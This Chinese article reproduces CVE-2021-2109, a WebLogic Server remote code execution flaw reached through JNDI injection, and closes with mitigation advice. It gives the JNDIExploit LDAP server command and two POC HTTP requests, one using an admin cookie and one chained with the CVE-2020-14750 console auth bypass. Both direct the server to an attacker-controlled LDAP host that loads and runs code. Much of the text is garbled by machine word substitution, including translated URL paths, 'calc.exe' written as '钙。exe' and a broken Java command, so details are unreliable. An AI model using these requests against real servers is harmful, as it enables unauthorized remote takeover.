这期内容当中小编将会给大家带来有关如何进行Weblogic Server远程代码执行漏洞cve - 2021 - 2109复现及分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。
2021年1月甲骨文发布了安全更新补丁,包含甲骨文产品系列中的329个新安全补丁。此次公告中特别提到了,2020年11月1日发布的Oracle Weblogic Server关于cve - 2020 - 14750漏洞的安全公告。强烈建议客户应用此补丁更新,及此公告中的其他补丁.CVE编号cve - 2021 - 2109,该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。
影响版本如下:
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0
<强>一、cve - 2021 - 2109 Weblogic Server远程代码执行漏洞复现
使用码头工人搭建Weblogic Server测试环境,Weblogic Server可以正常访问
<强> 1,正常登录后台的情况下进行JNDI注入
第一种情况,需要利用管理员帐号登录Weblogic Server后台,通过BurpSuite抓取登录数据包,获取登录饼干数据
在本机启动启动LDAP,可在https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11下载,命令如下:
java jar JNDIExploit-v1.11。jar——192.168.131.1
发送Weblogic Server远程代码执行漏洞cve - 2021 - 2109 JNDI注入POC数据包:
POST/控制台/consolejndi.portal ? _pageLabel=JNDIBindingPageGeneral& _nfpb=true& JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle (% 22 ldap://192.168.131; 1:1389/基本/WeblogicEcho; AdminServer % 22) HTTP/1.1
通过cmd变量执行ipconfig系统命令
<强> 2,配合Weblogic服务器未授权访问后台进行JNDI注入
第二种情况,不需要登录Weblogic Server后台。
需配合Weblogic Server cve - 2020 - 14750未授权访问漏洞,发送Weblogic Server远程代码执行漏洞cve - 2021 - 2109 JNDI注入POC数据包:
POST/控制台/css/% 25% 32% 65% 25% 32% 65% 25% 32% 66/consolejndi.portal ? _pageLabel=JNDIBindingPageGeneral& _nfpb=true& cqqhandle=com.bea.console.handles.JndiBindingHandle (% 22 ldap://192.168.131; 1:1389/基本/WeblogicEcho; AdminServer % 22) HTTP/1.1
通过cmd变量执行钙。exe,打开系统计算器
<强>二,cve - 2021 - 2109 Weblogic Server远程代码执行漏洞安全建议
<强> 1,禁用T3协议
如果您不依赖T3协议进行JVM通信,可通过暂时阻断T3协议缓解此漏洞带来的影响。
1)。进入Weblogic控制台,在base_domain配置页面中,进入“安全“选项卡页面,点击“筛选器”,配置筛选器。
2)。在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001否认t3 t3。
<强> 2,禁止启用IIOP
登陆Weblogic控制台,找到启用IIOP选项,取消勾选、重启生效
<强> 3,临时关闭后台/控制台/控制台。门户对外访问
<强> 4升级官方安全补丁
